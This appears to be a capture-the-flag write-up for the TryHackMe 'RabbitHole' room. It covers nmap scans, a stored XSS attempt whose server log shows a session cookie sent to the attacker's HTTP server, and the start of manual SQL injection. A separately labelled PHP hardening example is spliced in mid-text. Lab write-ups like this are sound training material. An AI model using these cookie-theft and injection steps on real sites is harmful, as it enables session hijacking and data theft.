The following post by anthonyjsaab is licensed under
0 - Introduction
Link to room:
Machine version: RabbitHole v1.3
This writeup walks you through a room on TryHackMe created by
1 - Port Scan
1a - Discovery
┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -p- rabbit.thm
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-25 21:53 EEST
Nmap scan report for rabbit.thm (10.10.45.20)
Host is up (0.096s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 723.03 seconds
1b - Versioning and OS fingerprinting
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p22,80 rabbit.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-26 08:25 EEST
Nmap scan report for rabbit.thm (10.10.187.189)
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.59 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Your page title here :)
|_http-server-header: Apache/2.4.59 (Debian)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds
Note that dirbusting does not uncover any hidden pages.
2b - Normal user interaction
2c - Attempting XSS
When we logged in, the admin's username was echoed on our web page. Additionally, the admin appears to log in every minute. If their landing page is the same as ours, and it lists all the users and their last logins, an XSS attempt could let us steal their cookie.
After spinning up an HTTP server on our Kali machine, we will try to register using the following payload as a username:
┌──(kali㉿kali)-[~]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.11.85.12 - - [26/Oct/2024 09:13:19] code 404, message File not found
10.11.85.12 - - [26/Oct/2024 09:13:19] "GET /cookie.php?cookie=PHPSESSID=17ac77983f5af39a34b0a8bfda8a09a1 HTTP/1.1" 404 -
This means that our payload was stored correctly and is rendered correctly in a browser.
We wait a while for the admin to log in again and trigger the payload in their browser. Unfortunately, after several minutes, no request was received on our HTTP server. We can confirm that the admin kept logging in while we waited by refreshing the page and seeing their login entries:
2d - SQLi
In the above image, we can see that our payload caused an SQL error message to be displayed. This is a clear indication that the target is vulnerable to SQLi.
However, since "anti-bruteforce" measures are in place, we will avoid using sqlmap and will instead do everything manually.
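As a hardening counterpart to the findings so far (the PHPSESSID cookie issued without HttpOnly in the scan, the username echoed back into the page, and the SQL error leaking through the login form), here is an added PHP login handler; it is not code from the writeup or the room, and the `users` table, its columns, and the DSN are assumptions:

```php
<?php
// Added hardening example (not from the writeup or the room). Closes the
// three weaknesses the scan and the writeup point at:
//  1. PHPSESSID issued without HttpOnly (nmap http-cookie-flags finding),
//  2. the username echoed into HTML unescaped (stored XSS vector),
//  3. the username concatenated into SQL (error-based SQLi, verbose errors).
// The `users` table, its columns and the DSN are assumptions.

// 1. Cookie flags must be set before session_start() issues the cookie.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,      // only sent over HTTPS
    'httponly' => true,      // not readable from document.cookie
    'samesite' => 'Strict',
]);
session_start();

$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';

try {
    $pdo = new PDO('mysql:host=localhost;dbname=app', 'app', getenv('DB_PASS'), [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
    ]);
    // 3. Bound parameter: the username is data, never part of the SQL text.
    $stmt = $pdo->prepare('SELECT id, password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
} catch (PDOException $e) {
    error_log('login query failed: ' . $e->getMessage());  // log it, never echo it
    http_response_code(500);
    exit('Temporary error');
}

if ($row === false || !password_verify($password, $row['password_hash'])) {
    http_response_code(401);
    exit('Login failed');    // same message either way: no username enumeration
}

session_regenerate_id(true);    // fresh session id after authentication
$_SESSION['user_id'] = $row['id'];

// 2. Encode at the point of rendering, so a stored payload stays inert text.
$safeName = htmlspecialchars($username, ENT_QUOTES | ENT_HTML5, 'UTF-8');
echo "<p>Welcome back, {$safeName}</p>";
```

With these settings the `http-cookie-flags` check in the scan above would no longer report a missing httponly flag, and a username containing script tags renders as literal text.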
2di - Enumerating how many columns are needed for a successful UNION with the previous SQL statement